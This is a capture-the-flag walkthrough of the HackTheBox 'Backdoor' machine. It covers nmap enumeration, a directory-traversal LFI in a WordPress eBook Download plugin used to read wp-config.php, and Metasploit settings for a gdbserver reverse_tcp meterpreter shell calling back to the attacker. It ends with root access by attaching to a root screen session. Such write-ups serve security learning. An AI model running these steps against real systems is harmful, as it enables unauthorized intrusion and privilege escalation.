This was a box that I didn’t like that much. It felt a little too CTF’ish to me. Despite that, I learned some cool things.
Nmap revealed 3 ports.
nmap -p- -sC -sV -A --min-rate=400 --min-parallelism=512 -vv backdoor.htb
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| 3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
| 256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIuoNkiwwo7nM8ZE767bKSHJh+RbMsbItjTbVvKK4xKMfZFHzroaLEe9a2/P1D9h2M6khvPI74azqcqnI8SUJAk=
| 256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.8.1
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Backdoor – Real-Life
1337/tcp open waste? syn-ack
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Looking at the webserver on port 80, it was a wordpress site.
So I thought of running
wpscan to see if there were any vulnerabilities that we can exploit. But it didn’t find anything. So I had to manually go and enumerate it. And I saw “ebook-download” plugin was installed.
With a quick google search I was able to find that this was vulnerable to LFI.
Offensive Security's Exploit Database Archive
WordPress Plugin eBook Download 1.1 - Directory Traversal.. webapps exploit for PHP platform
As mentioned in the POC, I tried to include wp-config.php and it worked.
With this I tried to include files that I though were important but I couldn’t find anything interesting. Then I remembered that the port 1337 was open. I didn’t know what service was running on that port. So I though of looking what process in running that service and seeing what that service is.
For this I made a little python script that will fuzz the running process ids and look at what command is running that process.
python3 proc-fuzz.py > proc
With this I was able to identify
gdbserver was running in port 1337.
And I was able to find a Metasploit module to exploit this.
GDB Server Remote Payload Execution - Metasploit - InfosecMatter
This page contains detailed information about how to use the exploit/multi/gdb/gdb_server_exec metasploit module. For…
Following this article, I was able to exploit this and get a meterpreter instance.
sudo msfdb run
set payload linux/x64/meterpreter/reverse_tcp
set RHOST 10.10.11.125
set RPORT 1337
set LHOST tun0
set LPORT 1234
Running linpeas as the “user” user I saw
screen was running which is a virtual screen-manager.
This stated that there was a screen session running as root named “root”. Also the screen binary was a SUID as well.
So I was able to attach to that screen session and get into a root shell.
screen -x root/root
“If you have any questions, make sure to leave them down in the comments, or contact me through social media.”
Email — email@example.com
Instagram — https://www.instagram.com/_kavi.gihan/
Happy Hacking !!! 😄